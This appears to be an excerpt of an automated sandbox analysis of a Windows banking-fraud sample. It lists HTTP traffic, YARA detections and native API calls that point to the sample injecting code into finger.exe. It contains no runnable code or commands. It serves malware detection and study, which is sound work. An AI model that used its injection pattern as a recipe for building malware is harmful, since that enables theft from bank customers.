                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:45:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07l7O1Z%2BsYyq6aQ1OFewzfj5DVpqiKtNwxrcxRHCa2ecqHy56MzZ7QbPTmwHmI3F2zjuDNKSx21STyNGZMumQ3bOgUL8PFNLtregVyTY508Bf%2BGgo39psVDvncNE2H2puQI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9002418afdc4421b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1685&rtt_var=842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:45:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLJG4ERKv2orYNq5xmGT9P4mGenCh8B0x3gLA1w2CzWGSpYauqq1ahAeFym4JgdKwdxZRh3Brf%2FIGXLxP8tVC6tK1LZ8hVM6yBM19mdzsNMIT%2BxTMu3YK5qJ9C5kLyS%2BB%2B0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9002419b0fbd4308-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1869&min_rtt=1869&rtt_var=934&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:45:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t99bqS8oMzQ9S83d9eLzkG12Tr0QFTSXlA5PF7jQINtEOtCEVByqjLQf%2BHoN5tNgJf6BUNWHA7CUFukKZneYl3SS5nkdlAlwRSZ9MsO1ljiRXKpDu2jBtCFGHMNiHi%2F3rUU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900241aaec927cb2-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:45:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYVp%2FBFZg2upHdZZbJSjQG8TgOQYgE3IPO1nBVakurEWbUDSKajLi7XVa5Wqts4D8iH%2Fg9BcX%2FGoKeTVY806iokxUo%2FmooNkb37U7IrqsFE2Z5DmM2tf2Cqzmq4FlRlyFRY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900241bada3d4381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 04:45:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Trace: 2BB6D4FF7B1BE172E068A73EB96D74D7700BEE5DF204EC677DD43B7AC000 Set-Cookie: _csrf=51cc0992ea1d7f7564af0ff2474a74decfe4864b45730fe918c859a9331e91f8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ot6xu2IKvk7J3KjRQi7HEvEgIdu79Hhi%22%3B%7D; path=/; HttpOnly Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" conten
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 04:45:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Trace: 2B0E8ABB617BD9862FFF8B999087830FF1EE3C5463E5355DA0E5584D0700 Set-Cookie: _csrf=ef877f69cc5ba2c61962b228895ee8b00dade9de4a0aab81822e4f67c9f925aea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224ke5O3JzvbJhBZdkbBxELmWJGKDfoojW%22%3B%7D; path=/; HttpOnly Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" conten

                E-Banking Fraud

                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0042C743 NtClose,8_2_0042C743
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512B60 NtClose,LdrInitializeThunk,8_2_01512B60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01512DF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01512C70
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015135C0 NtCreateMutant,LdrInitializeThunk,8_2_015135C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01514340 NtSetContextThread,8_2_01514340
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01514650 NtSuspendThread,8_2_01514650
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512BF0 NtAllocateVirtualMemory,8_2_01512BF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512BE0 NtQueryValueKey,8_2_01512BE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512B80 NtQueryInformationFile,8_2_01512B80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512BA0 NtEnumerateValueKey,8_2_01512BA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512AD0 NtReadFile,8_2_01512AD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512AF0 NtWriteFile,8_2_01512AF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512AB0 NtWaitForSingleObject,8_2_01512AB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512D10 NtMapViewOfSection,8_2_01512D10
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512D00 NtSetInformationFile,8_2_01512D00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512D30 NtUnmapViewOfSection,8_2_01512D30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512DD0 NtDelayExecution,8_2_01512DD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512DB0 NtEnumerateKey,8_2_01512DB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512C60 NtCreateKey,8_2_01512C60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512C00 NtQueryInformationProcess,8_2_01512C00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512CC0 NtQueryVirtualMemory,8_2_01512CC0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512CF0 NtOpenProcess,8_2_01512CF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512CA0 NtQueryInformationToken,8_2_01512CA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512F60 NtCreateProcessEx,8_2_01512F60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512F30 NtCreateSection,8_2_01512F30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512FE0 NtCreateFile,8_2_01512FE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512F90 NtProtectVirtualMemory,8_2_01512F90
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512FB0 NtResumeThread,8_2_01512FB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512FA0 NtQuerySection,8_2_01512FA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512E30 NtWriteVirtualMemory,8_2_01512E30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512EE0 NtQueueApcThread,8_2_01512EE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512E80 NtReadVirtualMemory,8_2_01512E80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512EA0 NtAdjustPrivilegesToken,8_2_01512EA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513010 NtOpenDirectoryObject,8_2_01513010
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513090 NtSetValueKey,8_2_01513090
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015139B0 NtGetContextThread,8_2_015139B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513D70 NtOpenThread,8_2_01513D70
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513D10 NtOpenProcessToken,8_2_01513D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C4340 NtSetContextThread,LdrInitializeThunk,11_2_032C4340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C4650 NtSuspendThread,LdrInitializeThunk,11_2_032C4650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2B60 NtClose,LdrInitializeThunk,11_2_032C2B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_032C2BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2BE0 NtQueryValueKey,LdrInitializeThunk,11_2_032C2BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_032C2BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2AF0 NtWriteFile,LdrInitializeThunk,11_2_032C2AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2AD0 NtReadFile,LdrInitializeThunk,11_2_032C2AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2F30 NtCreateSection,LdrInitializeThunk,11_2_032C2F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2FB0 NtResumeThread,LdrInitializeThunk,11_2_032C2FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2FE0 NtCreateFile,LdrInitializeThunk,11_2_032C2FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_032C2E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2EE0 NtQueueApcThread,LdrInitializeThunk,11_2_032C2EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_032C2D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2D10 NtMapViewOfSection,LdrInitializeThunk,11_2_032C2D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_032C2DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2DD0 NtDelayExecution,LdrInitializeThunk,11_2_032C2DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2C60 NtCreateKey,LdrInitializeThunk,11_2_032C2C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_032C2C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_032C2CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C35C0 NtCreateMutant,LdrInitializeThunk,11_2_032C35C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C39B0 NtGetContextThread,LdrInitializeThunk,11_2_032C39B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2B80 NtQueryInformationFile,11_2_032C2B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2AB0 NtWaitForSingleObject,11_2_032C2AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2F60 NtCreateProcessEx,11_2_032C2F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2FA0 NtQuerySection,11_2_032C2FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2F90 NtProtectVirtualMemory,11_2_032C2F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2E30 NtWriteVirtualMemory,11_2_032C2E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2EA0 NtAdjustPrivilegesToken,11_2_032C2EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2D00 NtSetInformationFile,11_2_032C2D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2DB0 NtEnumerateKey,11_2_032C2DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2C00 NtQueryInformationProcess,11_2_032C2C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2CF0 NtOpenProcess,11_2_032C2CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2CC0 NtQueryVirtualMemory,11_2_032C2CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3010 NtOpenDirectoryObject,11_2_032C3010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3090 NtSetValueKey,11_2_032C3090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3D10 NtOpenProcessToken,11_2_032C3D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3D70 NtOpenThread,11_2_032C3D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959340 NtCreateFile,11_2_02959340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959630 NtClose,11_2_02959630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959790 NtAllocateVirtualMemory,11_2_02959790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_029594A0 NtReadFile,11_2_029594A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959590 NtDeleteFile,11_2_02959590
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01581AA38_2_01581AA3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01591D5A8_2_01591D5A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E3D408_2_014E3D40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01597D738_2_01597D73
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FFDC08_2_014FFDC0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01559C328_2_01559C32
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FCF28_2_0159FCF2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FF098_2_0159FF09
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E1F928_2_014E1F92
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FFB18_2_0159FFB1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E9EB08_2_014E9EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334A35211_2_0334A352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033503E611_2_033503E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329E3F011_2_0329E3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333027411_2_03330274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033102C011_2_033102C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328010011_2_03280100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332A11811_2_0332A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0331815811_2_03318158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033441A211_2_033441A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033501AA11_2_033501AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033481CC11_2_033481CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332200011_2_03322000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329077011_2_03290770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032B475011_2_032B4750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328C7C011_2_0328C7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AC6E011_2_032AC6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329053511_2_03290535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0335059111_2_03350591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333442011_2_03334420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334244611_2_03342446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333E4F611_2_0333E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334AB4011_2_0334AB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03346BD711_2_03346BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328EA8011_2_0328EA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032A696211_2_032A6962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032929A011_2_032929A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0335A9A611_2_0335A9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329A84011_2_0329A840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329284011_2_03292840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032768B811_2_032768B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032BE8F011_2_032BE8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03332F3011_2_03332F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D2F2811_2_032D2F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032B0F3011_2_032B0F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03304F4011_2_03304F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0330EFA011_2_0330EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329CFE011_2_0329CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03282FC811_2_03282FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334EE2611_2_0334EE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03290E5911_2_03290E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334CE9311_2_0334CE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032A2E9011_2_032A2E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334EEDB11_2_0334EEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329AD0011_2_0329AD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332CD1F11_2_0332CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032A8DBF11_2_032A8DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328ADE011_2_0328ADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03290C0011_2_03290C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03330CB511_2_03330CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03280CF211_2_03280CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334132D11_2_0334132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0327D34C11_2_0327D34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D739A11_2_032D739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032952A011_2_032952A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033312ED11_2_033312ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AB2C011_2_032AB2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C516C11_2_032C516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0327F17211_2_0327F172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0335B16B11_2_0335B16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329B1B011_2_0329B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334F0E011_2_0334F0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033470E911_2_033470E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032970C011_2_032970C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333F0CC11_2_0333F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334F7B011_2_0334F7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032817EC11_2_032817EC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D563011_2_032D5630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033416CC11_2_033416CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334757111_2_03347571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332D5B011_2_0332D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033595C311_2_033595C3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334F43F11_2_0334F43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328146011_2_03281460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FB7611_2_0334FB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AFB8011_2_032AFB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03305BF011_2_03305BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032CDBF911_2_032CDBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03303A6C11_2_03303A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03347A4611_2_03347A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FA4911_2_0334FA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D5AA011_2_032D5AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03331AA311_2_03331AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332DAAC11_2_0332DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333DAC611_2_0333DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332591011_2_03325910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329995011_2_03299950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AB95011_2_032AB950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032FD80011_2_032FD800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032938E011_2_032938E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FF0911_2_0334FF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FFB111_2_0334FFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03291F9211_2_03291F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03253FD511_2_03253FD5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03253FD211_2_03253FD2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03299EB011_2_03299EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03347D7311_2_03347D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03293D4011_2_03293D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03341D5A11_2_03341D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AFDC011_2_032AFDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03309C3211_2_03309C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334FCF211_2_0334FCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02941ED011_2_02941ED0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293AFF011_2_0293AFF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293CFE011_2_0293CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293AFE811_2_0293AFE8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293CDC011_2_0293CDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293B13611_2_0293B136
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293B14011_2_0293B140
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294377011_2_02943770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294556011_2_02945560
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0295BC2011_2_0295BC20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AE39811_2_035AE398
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AE4B311_2_035AE4B3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035ACBAA11_2_035ACBAA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AD91811_2_035AD918
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AE84C11_2_035AE84C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_035AD8E311_2_035AD8E3
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0327B970 appears 283 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 032D7E54 appears 109 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0330F290 appears 105 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 032FEA12 appears 86 times
